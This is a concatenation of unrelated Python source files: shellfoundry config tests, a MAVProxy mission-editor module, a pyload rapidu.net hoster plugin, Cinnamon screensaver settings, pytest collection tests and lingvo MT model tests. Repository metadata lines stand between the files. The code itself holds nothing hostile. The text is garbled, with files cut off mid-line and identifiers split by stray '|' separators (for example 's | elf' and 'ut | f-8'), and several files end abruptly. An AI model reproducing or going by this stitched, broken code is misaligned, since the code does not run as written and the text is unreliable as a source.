from shellfoundry.utilities.config.config_file_creation import ConfigFileCreation
from shellfoundry.utilities.config.config_record import ConfigRecord
class TestConfigRecord(fake_filesystem_unittest.TestCase):
def setUp(self):
self.setUpPyfakefs()
@patch(
"shellfoundry.utilities.config.config_file_creation.open", create=True
) # create=True to overcome the issue with builtin methods default fallback
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_create_config_file(self, echo_mock, open_mock):
# Arrange
cfg_path = "/quali/shellfoundry/global_config.yml"
open_mock.side_effect = [
IOError("Failed to create the file, maybe it is already exists")
]
# Act
cfg_creation = ConfigFileCreation()
# Assert
self.assertRaises(IOError, cfg_creation.create, cfg_path)
echo_mock.assert_any_call(
"Failed to create the file, maybe it is already exists"
)
echo_mock.assert_any_call("Failed to create config file")
@patch("shellfoundry.utilities.config.config_file_creation.open", create=True)
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_crate_config_file_due_to_already_exists_no_error_is_raised(
self, echo_mock, open_mock
):
# Arrange
cfg_path = "/quali/shellfoundry/global_config.yml"
open_mock.side_effect = [
IOError("Failed to create the file, maybe it is already exists")
]
# Act
with patch(
"shellfoundry.utilities.config.config_file_creation.os.path.exists"
) as path_mock:
path_mock.side_effect = [False, True, True]
ConfigFileCreation().create(cfg_path)
# Assert
echo_mock.assert_called_once_with("Creating config file...")
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_create_folder_hierarchy(self, echo_mock):
# Arrange
cfg_path = "/quali/shellfoundry/global_config.yml"
# Act
with patch(
"shellfoundry.utilities.config.config_file_creation.os.makedirs"
) as makedirs_mock:
makedirs_mock.side_effect = [
OSError("Failed to create the folders hierarchy")
]
self.assertRaises(OSError, ConfigFileCreation().create, cfg_path)
# Assert
echo_mock.assert_any_call("Failed to create config file")
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_save_new_record(self, echo_mock):
# Arrange
self.fs.create_file(
"/quali/shellfoundry/global_config.yml",
contents="""
install:
host: someaddress""",
)
# Act
with patch("shellfoundry.utilities.config.config_context.yaml") as yaml_mock:
yaml_mock.safe_load.side_effect = [Exception()]
context = ConfigContext("/quali/shellfoundry/global_config.yml")
record = ConfigRecord("key", "value")
record.save(context)
# Assert
echo_mock.assert_called_once_with("Failed to save key value")
file_content = self.fs.get_object(
"/quali/shellfoundry/global_config.yml"
).contents
import os
self.assertTrue(
file_content
== """
install:
host: someaddress""",
"Expected: {}{}Actual: {}".format(
"""
install:
host: someaddress""",
os.linesep,
|
file_content,
),
)
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_delete_record(self, echo_mock):
# Arrange
self.fs.create_file(
"/quali/shellfoundry/global_config.yml",
|
contents="""
install:
host: someaddress""",
)
# Act
with patch("shellfoundry.utilities.config.config_context.yaml") as yaml_mock:
yaml_mock.safe_load.side_effect = [Exception()]
context = ConfigContext("/quali/shellfoundry/global_config.yml")
record = ConfigRecord("host")
record.delete(context)
# Assert
echo_mock.assert_called_once_with("Failed to delete key")
file_content = self.fs.get_object(
"/quali/shellfoundry/global_config.yml"
).contents
import os
self.assertTrue(
file_content
== """
install:
host: someaddress""",
"Expected: {}{}Actual: {}".format(
"""
install:
""",
os.linesep,
file_content,
),
)
|
njoubert/MAVProxy
|
MAVProxy/modules/mavproxy_misseditor/__init__.py
|
Python
|
gpl-3.0
| 13,978 | 0.00651 |
#!/usr/bin/env python
'''
mission editor module
Michael Day
June 2104
'''
from MAVProxy.modules.lib import mp_module
from MAVProxy.modules.lib import mp_util
from MAVProxy.modules.mavproxy_misseditor import me_event
MissionEditorEvent = me_event
|
.MissionEditorEvent
from pymavlink import mavutil
import multiprocessing, time
import threading
import Queue
import traceback
class MissionEditorEventThread(threading.Thread):
def __init__(self, mp_misseditor, q, l):
threading.Thread.__init__(self)
self.mp_misseditor = mp_misseditor
self.event_queue = q
s
|
elf.event_queue_lock = l
self.time_to_quit = False
def run(self):
while not self.time_to_quit:
queue_access_start_time = time.time()
self.event_queue_lock.acquire()
request_read_after_processing_queue = False
while self.event_queue.qsize() > 0 and (time.time() - queue_access_start_time) < 0.6:
event = self.event_queue.get()
if event.get_type() == me_event.MEE_READ_WPS:
self.mp_misseditor.mpstate.module('wp').cmd_wp(['list'])
#list the rally points while I'm add it:
#TODO: DON'T KNOW WHY THIS DOESN'T WORK
#self.mp_misseditor.mpstate.module('rally').cmd_rally(['list'])
#means I'm doing a read & don't know how many wps to expect:
self.mp_misseditor.num_wps_expected = -1
self.wps_received = {}
elif event.get_type() == me_event.MEE_TIME_TO_QUIT:
self.time_to_quit = True
elif event.get_type() == me_event.MEE_GET_WP_RAD:
wp_radius = self.mp_misseditor.module('param').mav_param.get('WP_RADIUS')
if (wp_radius is None):
continue
self.mp_misseditor.gui_event_queue_lock.acquire()
self.mp_misseditor.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_WP_RAD,wp_rad=wp_radius))
self.mp_misseditor.gui_event_queue_lock.release()
elif event.get_type() == me_event.MEE_SET_WP_RAD:
self.mp_misseditor.param_set('WP_RADIUS',event.get_arg("rad"))
elif event.get_type() == me_event.MEE_GET_LOIT_RAD:
loiter_radius = self.mp_misseditor.module('param').mav_param.get('WP_LOITER_RAD')
if (loiter_radius is None):
continue
self.mp_misseditor.gui_event_queue_lock.acquire()
self.mp_misseditor.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_LOIT_RAD,loit_rad=loiter_radius))
self.mp_misseditor.gui_event_queue_lock.release()
elif event.get_type() == me_event.MEE_SET_LOIT_RAD:
loit_rad = event.get_arg("rad")
if (loit_rad is None):
continue
self.mp_misseditor.param_set('WP_LOITER_RAD', loit_rad)
#need to redraw rally points
# Don't understand why this rally refresh isn't lagging...
# likely same reason why "timeout setting WP_LOITER_RAD"
#comes back:
#TODO: fix timeout issue
self.mp_misseditor.mpstate.module('rally').rallyloader.last_change = time.time()
elif event.get_type() == me_event.MEE_GET_WP_DEFAULT_ALT:
self.mp_misseditor.gui_event_queue_lock.acquire()
self.mp_misseditor.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_WP_DEFAULT_ALT,def_wp_alt=self.mp_misseditor.mpstate.settings.wpalt))
self.mp_misseditor.gui_event_queue_lock.release()
elif event.get_type() == me_event.MEE_SET_WP_DEFAULT_ALT:
self.mp_misseditor.mpstate.settings.command(["wpalt",event.get_arg("alt")])
elif event.get_type() == me_event.MEE_WRITE_WPS:
self.mp_misseditor.module('wp').wploader.clear()
self.mp_misseditor.master.waypoint_count_send(event.get_arg("count"))
self.mp_misseditor.num_wps_expected = event.get_arg("count")
self.mp_misseditor.wps_received = {}
elif event.get_type() == me_event.MEE_WRITE_WP_NUM:
w = mavutil.mavlink.MAVLink_mission_item_message(
self.mp_misseditor.target_system,
self.mp_misseditor.target_component,
event.get_arg("num"),
event.get_arg("frame"),
event.get_arg("cmd_id"),
0, 1,
event.get_arg("p1"), event.get_arg("p2"),
event.get_arg("p3"), event.get_arg("p4"),
event.get_arg("lat"), event.get_arg("lon"),
event.get_arg("alt"))
self.mp_misseditor.module('wp').wploader.add(w)
self.mp_misseditor.master.mav.send(
self.mp_misseditor.module('wp').wploader.wp(w.seq))
#tell the wp module to expect some waypoints
self.mp_misseditor.module('wp').loading_waypoints = True
elif event.get_type() == me_event.MEE_LOAD_WP_FILE:
self.mp_misseditor.module('wp').cmd_wp(['load',event.get_arg("path")])
#Wait for the other thread to finish loading waypoints.
#don't let this loop run forever in case we have a lousy
#link to the plane
i = 0
while (i < 10 and
self.mp_misseditor.module('wp').loading_waypoints):
time.sleep(1)
i = i + 1
#don't modify queue while in the middile of processing it:
request_read_after_processing_queue = True
elif event.get_type() == me_event.MEE_SAVE_WP_FILE:
self.mp_misseditor.module('wp').cmd_wp(['save',event.get_arg("path")])
self.event_queue_lock.release()
#if event processing operations require a mission referesh in GUI
#(e.g., after a load or a verified-completed write):
if (request_read_after_processing_queue):
self.event_queue_lock.acquire()
self.event_queue.put(MissionEditorEvent(me_event.MEE_READ_WPS))
self.event_queue_lock.release()
#periodically re-request WPs that were never received:
#DON'T NEED TO! -- wp module already doing this
time.sleep(0.2)
class MissionEditorModule(mp_module.MPModule):
'''
A Mission Editor for use with MAVProxy
'''
def __init__(self, mpstate):
super(MissionEditorModule, self).__init__(mpstate, "misseditor", "mission editor", public = True)
self.num_wps_expected = 0 #helps me to know if all my waypoints I'm expecting have arrived
self.wps_received = {}
from ..lib.multiprocessing_queue import makeIPCQueue
self.event_queue = makeIPCQueue()
self.event_queue_lock = multiprocessing.Lock()
self.gui_event_queue = makeIPCQueue()
self.gui_event_queue_lock = multiprocessing.Lock()
self.event_thread = MissionEditorEventThread(self, self.event_queue, self.event_queue_lock)
self.event_thread.start()
self.close_window = multiprocessing.Semaphore()
self.close_window.acquire()
self.child = multiprocessing.Process(target=self.child_task,args=(self.event_queue,self.event_queue_lock,self.gui_event_queue,self.gui_event_queue_lock,self.close_window))
self.child.start()
self.mpstate.miss_editor = self
self.last_unload_check_time = time.time()
self.unload_check_interval = 0.1 # seconds
self.time_to
|
rlindner81/pyload
|
module/plugins/hoster/RapiduNet.py
|
Python
|
gpl-3.0
| 3,047 | 0.001313 |
# -*- coding: ut
|
f-8 -*-
import time
import pycurl
from module.plugins.captcha.ReCaptcha import ReCaptcha
from module.plugins.internal.misc import json
from module.plugins.internal.SimpleHoster import SimpleHoster
class RapiduNet(SimpleHoster):
__name__ = "RapiduNet"
|
__type__ = "hoster"
__version__ = "0.14"
__status__ = "testing"
__pattern__ = r'https?://(?:www\.)?rapidu\.net/(?P<ID>\d{10})'
__config__ = [("activated", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
("fallback", "bool",
"Fallback to free download if premium fails", True),
("chk_filesize", "bool", "Check file size", True),
("max_wait", "int", "Reconnect if waiting time is greater than minutes", 10)]
__description__ = """Rapidu.net hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("prOq", None)]
COOKIES = [("rapidu.net", "rapidu_lang", "en")]
INFO_PATTERN = r'<h1 title="(?P<N>.*)">.*</h1>\s*<small>(?P<S>\d+(\.\d+)?)\s(?P<U>\w+)</small>'
OFFLINE_PATTERN = r'<h1>404'
ERROR_PATTERN = r'<div class="error">'
RECAPTCHA_KEY = r'6Ld12ewSAAAAAHoE6WVP_pSfCdJcBQScVweQh8Io'
def setup(self):
self.resume_download = True
self.multiDL = self.premium
def handle_free(self, pyfile):
self.req.http.lastURL = pyfile.url
self.req.http.c.setopt(
pycurl.HTTPHEADER,
["X-Requested-With: XMLHttpRequest"])
jsvars = self.get_json_response("https://rapidu.net/ajax.php",
get={'a': "getLoadTimeToDownload"},
post={'_go': ""})
if str(jsvars['timeToDownload']) == "stop":
t = (24 * 60 * 60) - (int(time.time()) %
(24 * 60 * 60)) + time.altzone
self.log_info(_("You've reach your daily download transfer"))
# @NOTE: check t in case of not synchronised clock
self.retry(10, 10 if t < 1 else None, _("Try tomorrow again"))
else:
self.wait(int(jsvars['timeToDownload']) - int(time.time()))
self.captcha = ReCaptcha(pyfile)
response, challenge = self.captcha.challenge(self.RECAPTCHA_KEY)
jsvars = self.get_json_response("https://rapidu.net/ajax.php",
get={'a': "getCheckCaptcha"},
post={'_go': "",
'captcha1': challenge,
'captcha2': response,
'fileId': self.info['pattern']['ID']})
if jsvars['message'] == "success":
self.link = jsvars['url']
def get_json_response(self, *args, **kwargs):
res = self.load(*args, **kwargs)
if not res.startswith('{'):
self.retry()
self.log_debug(res)
return json.loads(res)
|
mattthur/Cinnamon
|
files/usr/lib/cinnamon-settings/modules/cs_screensaver.py
|
Python
|
gpl-2.0
| 16,729 | 0.003288 |
#!/usr/bin/env python2
from SettingsWidgets import *
from gi.repository import Gtk, Gdk, GLib, Pango
import os, json, subprocess, re
from xml.etree import ElementTree
import gettext
LOCK_DELAY_OPTIONS = [
(0, _("Immediately")),
(15, _("After 15 seconds")),
(30, _("After 30 seconds")),
(60, _("After 1 minute")),
(120, _("After 2 minutes")),
(180, _("After 3 minutes")),
(300, _("After 5 minutes")),
(600, _("After 10 minutes")),
(1800, _("After 30 minutes")),
(3600, _("After 1 hour"))
]
LOCK_INACTIVE_OPTIONS = [
(0, _("Never")),
(60, _("After 1 minute")),
(300, _("After 5 minutes")),
(600, _("After 10 minutes")),
(900, _("After 15 minutes")),
(1800, _("After 30 minutes")),
(2700, _("After 45 minutes")),
(3600, _("After 1 hour"))
]
XSCREENSAVER_PATH = "/usr/share/xscreensaver/config/"
def list_header_func(row, before, user_data):
if before and not row.get_header():
row.set_header(Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL))
class Module:
name = "screensaver"
category = "prefs"
comment = _("Manage screen lock settings")
def __init__(self, content_box):
keywords = _("screensaver, lock, password, away, message")
sidePage = SidePage(_("Screensaver"), "cs-screensaver", keywords, content_box, module=self)
self.sidePage = sidePage
def on_module_selected(self):
if self.loaded:
return
print "Loading Screensaver module"
schema = "org.cinnamon.desktop.screensaver"
self.settings = Gio.Settings.new(schema)
self.sidePage.stack = SettingsStack()
self.sidePage.add_widget(self.sidePage.stack)
# Screensaver
page = SettingsPage()
page.expand = True
self.sidePage.stack.add_titled(page, "screensaver", _("Screensaver"))
settings = ScreensaverBox(_("Select screensaver"))
page.pack_start(settings, True, True, 0)
# Settings
page = SettingsPage()
self.sidePage.stack.add_titled(page, "settings", _("Settings"))
settings = page.add_section(_("Lock settings"))
size_group = Gtk.SizeGroup.new(Gtk.SizeGroupMode.HORIZONTAL)
widget = GSettingsSwitch(_("Lock the computer when put to sleep"), "org.cinnamon.settings-daemon.plugins.power", "lock-on-suspend")
widget.set_tooltip_text(_("Enable this option to require a password when the computer wakes up from suspend"))
settings.add_row(widget)
widget = GSettingsSwitch(_("Lock the computer when the screen turns off"), schema, "lock-enabled")
widget.set_tooltip_text(_("Enable this option to require a password when the screen turns itself off, or when the screensaver activates after a period of inactivity"))
settings.add_row(widget)
widget = GSettingsComboBox(_("Delay before locking the screen"), schema, "lock-delay", LOCK_DELAY_OPTIONS, valtype="uint", size_group=size_group)
widget.set_tooltip_text(_("This option defines the amount of time to wait before locking the screen, after showing the screensaver or after turning off the screen"))
settings.add_reveal_row(widget, schema, "lock-enabled")
widget = GSettingsComboBox(_("Lock the computer when inactive"), "org.cinnamon.desktop.session", "idle-delay", LOCK_INACTIVE_OPTIONS, valtype="uint", size_group=size_group)
widget.set_tooltip_text(_("This option defines the amount of time to wait before locking the screen, when the computer is not being used"))
settings.add_row(widget)
settings = page.add_section(_("Away message"))
widget = GSettingsEntry(_("Show this message when the screen is locked"), schema, "default-message")
widget.set_child_packing(widget.content_widget, True, True, 0, Gtk.PackType.START)
widget.set_tooltip_text(_("This is the default message displayed on your lock screen"))
settings.add_row(widget)
settings.add_row(GSettingsFontButton(_("Font"), "org.cinnamon.desktop.screensaver", "font-message"))
widget = GSettingsSwitch(_("Ask for a custom message when locking the screen from the menu"), schema, "ask-for-away-message")
widget.set_tooltip_text(_("This option allows you to type a message each time you lock the screen from the menu"))
settings.add_row(widget)
# Date
page = SettingsPage()
self.sidePage.stack.add_titled(page, "date", _("Date"))
settings = page.add_section(_("Date and Time"))
size_group = Gtk.SizeGroup.new(Gtk.SizeGroupMode.HORIZONTAL)
widget = GSettingsSwitch(_("Use a custom date and time format"), schema, "use-custom-format")
settings.add_row(widget)
widget = GSettingsEntry(_("Time Format"), schema, "time-format", size_group=size_group)
settings.add_reveal_row(widget, schema, "use-custom-format")
widget = GSettingsEntry(_("Date Format: "), schema, "date-format"
|
, size_group=size_group)
settings.add_reveal_row(widget, schema
|
, "use-custom-format")
widget = GSettingsFontButton(_("Time Font"), "org.cinnamon.desktop.screensaver", "font-time", size_group=size_group)
settings.add_row(widget)
widget = GSettingsFontButton(_("Date Font"), "org.cinnamon.desktop.screensaver", "font-date", size_group=size_group)
settings.add_row(widget)
class ScreensaverBox(Gtk.Box):
def __init__(self, title):
Gtk.Box.__init__(self)
self.set_orientation(Gtk.Orientation.VERTICAL)
frame = Gtk.Frame()
frame.set_shadow_type(Gtk.ShadowType.IN)
frame_style = frame.get_style_context()
frame_style.add_class("view")
self.pack_start(frame, True, True, 0)
schema = "org.cinnamon.desktop.screensaver"
self.settings = Gio.Settings.new(schema)
self.webkit_executable = None
self.xscreensaver_executable = None
self.proc = None
self.current_name = self.settings.get_string("screensaver-name")
if self.current_name == "webkit@cinnamon.org":
self.current_name = self.settings.get_string("screensaver-webkit-theme")
elif self.current_name == "xscreensaver@cinnamon.org":
self.current_name = "xscreensaver-" + self.settings.get_string("xscreensaver-hack")
self.main_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
frame.add(self.main_box)
toolbar = Gtk.Toolbar.new()
Gtk.StyleContext.add_class(Gtk.Widget.get_style_context(toolbar), "cs-header")
label = Gtk.Label()
label.set_markup("<b>%s</b>" % title)
title_holder = Gtk.ToolItem()
title_holder.add(label)
toolbar.add(title_holder)
self.main_box.add(toolbar)
toolbar_separator = Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL)
self.main_box.add(toolbar_separator)
separator_context = toolbar_separator.get_style_context()
frame_color = frame_style.get_border_color(Gtk.StateFlags.NORMAL).to_string()
css_provider = Gtk.CssProvider()
css_provider.load_from_data(".separator { -GtkWidget-wide-separators: 0; \
color: %s; \
}" % frame_color)
separator_context.add_provider(css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)
self.socket_box = Gtk.Box()
self.socket_box.set_border_width(30)
self.socket_box.set_size_request(-1, 300)
self.socket_box.override_background_color(Gtk.StateFlags.NORMAL, Gdk.RGBA(0, 0, 0, 1))
self.main_box.pack_start(self.socket_box, False, False, 0)
self.main_box.add(Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL))
scw = Gtk.ScrolledWindow()
scw.expand = True
scw.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)
scw.set_shadow_type(Gtk.ShadowType.NONE)
self.main_box.pack_start(scw, True, True, 0)
self.list_box = Gtk.ListBox()
self.list_box.set_selection_mode(Gtk.SelectionMode.SINGLE)
self.list_box.set_h
|
jaraco/pytest
|
testing/test_collection.py
|
Python
|
mit
| 26,378 | 0.000986 |
import pytest, py
from _pytest.main import Session, EXIT_NOTESTSCOLLECTED
class TestCollector:
def test_collect_versus_item(self):
from pytest import Collector, Item
assert not issubclass(Collector, Item)
assert not issubclass(Item, Collector)
def test_compat_attributes(self, testdir, recwarn):
modcol = testdir.getmodulecol("""
def test_pass(): pass
def test_fail(): assert 0
""")
recwarn.clear()
assert modcol.Module == pytest.Module
assert modcol.Class == pytest.Class
assert modcol.Item == pytest.Item
assert modcol.File == pytest.File
assert modcol.Function == pytest.Function
def test_check_equality(self, testdir):
modcol = testdir.getmodulecol("""
def test_pass(): pass
def test_fail(): assert 0
""")
fn1 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn1, pytest.Function)
fn2 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn2, pytest.Function)
assert fn1 == fn2
assert fn1 != modcol
if py.std.sys.version_info < (3, 0):
assert cmp(fn1, fn2) == 0
assert hash(fn1) == hash(fn2)
fn3 = testdir.collect_by_name(modcol, "test_fail")
assert isinstance(fn3, pytest.Function)
assert not (fn1 == fn3)
assert fn1 != fn3
for fn in fn1,fn2,fn3:
assert fn != 3
assert fn != modcol
assert fn != [1,2,3]
assert [1,2,3] != fn
assert modcol != fn
def test_getparent(self, testdir):
modcol = testdir.getmodulecol("""
class TestClass:
def test_foo():
pass
""")
cls = testdir.collect_by_name(modcol, "TestClass")
fn = testdir.collect_by_name(
testdir.collect_by_name(cls, "()"), "test_foo")
parent = fn.getparent(pytest.Module)
assert parent is modcol
parent = fn.getparent(
|
pytest.Fu
|
nction)
assert parent is fn
parent = fn.getparent(pytest.Class)
assert parent is cls
def test_getcustomfile_roundtrip(self, testdir):
hello = testdir.makefile(".xxx", hello="world")
testdir.makepyfile(conftest="""
import pytest
class CustomFile(pytest.File):
pass
def pytest_collect_file(path, parent):
if path.ext == ".xxx":
return CustomFile(path, parent=parent)
""")
node = testdir.getpathnode(hello)
assert isinstance(node, pytest.File)
assert node.name == "hello.xxx"
nodes = node.session.perform_collect([node.nodeid], genitems=False)
assert len(nodes) == 1
assert isinstance(nodes[0], pytest.File)
class TestCollectFS:
def test_ignored_certain_directories(self, testdir):
tmpdir = testdir.tmpdir
tmpdir.ensure("build", 'test_notfound.py')
tmpdir.ensure("dist", 'test_notfound.py')
tmpdir.ensure("_darcs", 'test_notfound.py')
tmpdir.ensure("CVS", 'test_notfound.py')
tmpdir.ensure("{arch}", 'test_notfound.py')
tmpdir.ensure(".whatever", 'test_notfound.py')
tmpdir.ensure(".bzr", 'test_notfound.py')
tmpdir.ensure("normal", 'test_found.py')
for x in tmpdir.visit("test_*.py"):
x.write("def test_hello(): pass")
result = testdir.runpytest("--collect-only")
s = result.stdout.str()
assert "test_notfound" not in s
assert "test_found" in s
def test_custom_norecursedirs(self, testdir):
testdir.makeini("""
[pytest]
norecursedirs = mydir xyz*
""")
tmpdir = testdir.tmpdir
tmpdir.ensure("mydir", "test_hello.py").write("def test_1(): pass")
tmpdir.ensure("xyz123", "test_2.py").write("def test_2(): 0/0")
tmpdir.ensure("xy", "test_ok.py").write("def test_3(): pass")
rec = testdir.inline_run()
rec.assertoutcome(passed=1)
rec = testdir.inline_run("xyz123/test_2.py")
rec.assertoutcome(failed=1)
def test_testpaths_ini(self, testdir, monkeypatch):
testdir.makeini("""
[pytest]
testpaths = gui uts
""")
tmpdir = testdir.tmpdir
tmpdir.ensure("env", "test_1.py").write("def test_env(): pass")
tmpdir.ensure("gui", "test_2.py").write("def test_gui(): pass")
tmpdir.ensure("uts", "test_3.py").write("def test_uts(): pass")
# executing from rootdir only tests from `testpaths` directories
# are collected
items, reprec = testdir.inline_genitems('-v')
assert [x.name for x in items] == ['test_gui', 'test_uts']
# check that explicitly passing directories in the command-line
# collects the tests
for dirname in ('env', 'gui', 'uts'):
items, reprec = testdir.inline_genitems(tmpdir.join(dirname))
assert [x.name for x in items] == ['test_%s' % dirname]
# changing cwd to each subdirectory and running pytest without
# arguments collects the tests in that directory normally
for dirname in ('env', 'gui', 'uts'):
monkeypatch.chdir(testdir.tmpdir.join(dirname))
items, reprec = testdir.inline_genitems()
assert [x.name for x in items] == ['test_%s' % dirname]
class TestCollectPluginHookRelay:
def test_pytest_collect_file(self, testdir):
wascalled = []
class Plugin:
def pytest_collect_file(self, path, parent):
if not path.basename.startswith("."):
# Ignore hidden files, e.g. .testmondata.
wascalled.append(path)
testdir.makefile(".abc", "xyz")
pytest.main([testdir.tmpdir], plugins=[Plugin()])
assert len(wascalled) == 1
assert wascalled[0].ext == '.abc'
def test_pytest_collect_directory(self, testdir):
wascalled = []
class Plugin:
def pytest_collect_directory(self, path, parent):
wascalled.append(path.basename)
testdir.mkdir("hello")
testdir.mkdir("world")
pytest.main(testdir.tmpdir, plugins=[Plugin()])
assert "hello" in wascalled
assert "world" in wascalled
class TestPrunetraceback:
def test_custom_repr_failure(self, testdir):
p = testdir.makepyfile("""
import not_exists
""")
testdir.makeconftest("""
import pytest
def pytest_collect_file(path, parent):
return MyFile(path, parent)
class MyError(Exception):
pass
class MyFile(pytest.File):
def collect(self):
raise MyError()
def repr_failure(self, excinfo):
if excinfo.errisinstance(MyError):
return "hello world"
return pytest.File.repr_failure(self, excinfo)
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*ERROR collecting*",
"*hello world*",
])
@pytest.mark.xfail(reason="other mechanism for adding to reporting needed")
def test_collect_report_postprocessing(self, testdir):
p = testdir.makepyfile("""
import not_exists
""")
testdir.makeconftest("""
import pytest
def pytest_make_collect_report(__multicall__):
rep = __multicall__.execute()
rep.headerlines += ["header1"]
return rep
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*ERROR collecting*",
"*header1*",
])
class TestCustomConftests:
def test_ignore_collect_path(self, testdir):
testdir.makeconftest("""
def pytest_ignore_collect(path, config):
return path.basename.startswith("x") or \
path.basename == "test_one.py"
""")
su
|
tensorflow/lingvo
|
lingvo/tasks/mt/model_test.py
|
Python
|
apache-2.0
| 35,425 | 0.011066 |
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for MT Models."""
import lingvo.compat as tf
from lingvo.core import base_input_generator
from lingvo.core import base_layer
from lingvo.core import cluster_factory
from lingvo.core import layers
from lingvo.core import optimizer
from lingvo.core import py_utils
from lingvo.core import schedule
from lingvo.core import test_helper
from lingvo.core import test_utils
from lingvo.tasks.mt import decoder
from lingvo.tasks.mt import encoder
from lingvo.tasks.mt import input_generator
from lingvo.tasks.mt import model
import numpy as np
FLAGS = tf.flags.FLAGS
_TF_RANDOM_SEED = 93820986
class TestInputGenerator(base_input_generator.BaseSequenceInputGenerator):
@classmethod
def Params(cls):
p = super().Params()
p.Define('split', True, '')
return p
def __init__(self, params):
super().__init__(params)
self._step = 0
def InfeedBatchSize(self):
if self.params.split:
return 10 / 2
return 10
def _InputBatch(self):
np.random.seed(1)
bs, sl = 10, 7
src_ids = tf.constant(
np.random.randint(low=0, high=8192 - 1, size=[bs, sl], dtype=np.int32))
tgt_ids = tf.constant(
np.random.randint(low=0, high=8192 - 1, size=[bs, sl], dtype=np.int32))
tgt_labels = tf.constant(
np.random.randint(low=0, high=8192 - 1, size=[bs, sl], dtype=np.int32))
tgt_weights = tf.constant(np.ones(shape=[bs, sl], dtype=np.float32))
src_paddings = tf.zeros([bs, sl])
tgt_paddings = tf.zeros([bs, sl])
ret = py_utils.NestedMap()
ret.src = py_utils.NestedMap()
ret.tgt = py_utils.NestedMap()
if self.params.split:
src_ids = tf.split(src_ids, 2, 0)
|
src_paddings = tf.split(src_paddings, 2, 0)
tgt_ids = tf.split
|
(tgt_ids, 2, 0)
tgt_labels = tf.split(tgt_labels, 2, 0)
tgt_paddings = tf.split(tgt_paddings, 2, 0)
tgt_weights = tf.split(tgt_weights, 2, 0)
ret.src.ids = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: src_ids[0], lambda: src_ids[1])
ret.src.paddings = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: src_paddings[0], lambda: src_paddings[1])
ret.tgt.ids = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_ids[0], lambda: tgt_ids[1])
ret.tgt.labels = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_labels[0], lambda: tgt_labels[1])
ret.tgt.paddings = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_paddings[0], lambda: tgt_paddings[1])
ret.tgt.weights = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_weights[0], lambda: tgt_weights[1])
else:
ret.src.ids = src_ids
ret.src.paddings = src_paddings
ret.tgt.ids = tgt_ids
ret.tgt.labels = tgt_labels
ret.tgt.paddings = tgt_paddings
ret.tgt.weights = tgt_weights
return ret
class TransformerModelTest(test_utils.TestCase):
def _InputParams(self):
p = input_generator.NmtInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.tfrecord')
vocab_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.vocab')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [40]
p.bucket_batch_limit = [8]
p.source_max_length = 200
p.target_max_length = 200
p.tokenizer.token_vocab_filepath = vocab_file
p.tokenizer.vocab_size = 32000
return p
def _EncoderParams(self):
p = encoder.TransformerEncoder.Params()
p.name = 'encoder'
p.random_seed = 1234
p.model_dim = 4
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim(
seed=p.random_seed)
p.position_emb.embedding_dim = 4
p.transformer_stack.transformer_tpl.tr_atten_tpl.num_attention_heads = 2
p.transformer_stack.transformer_tpl.tr_fflayer_tpl.hidden_dim = 5
return p
def _DecoderParams(self):
p = decoder.TransformerDecoder.Params()
p.name = 'decoder'
p.random_seed = 1234
p.source_dim = 4
p.model_dim = 4
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim(
seed=p.random_seed)
p.position_emb.embedding_dim = 4
p.trans_tpl.source_dim = 4
p.trans_tpl.tr_atten_tpl.source_dim = 4
p.trans_tpl.tr_atten_tpl.num_attention_heads = 2
p.trans_tpl.tr_fflayer_tpl.input_dim = 4
p.trans_tpl.tr_fflayer_tpl.hidden_dim = 8
p.softmax.num_shards = 1
p.target_seq_len = 5
return p
def _testParams(self):
p = model.TransformerModel.Params()
p.name = 'test_mdl'
p.input = self._InputParams()
p.encoder = self._EncoderParams()
p.decoder = self._DecoderParams()
p.train.learning_rate = 2e-4
return p
def testConstruction(self):
with self.session():
p = self._testParams()
mdl = p.Instantiate()
print('vars = ', mdl.vars)
flatten_vars = mdl.vars.Flatten()
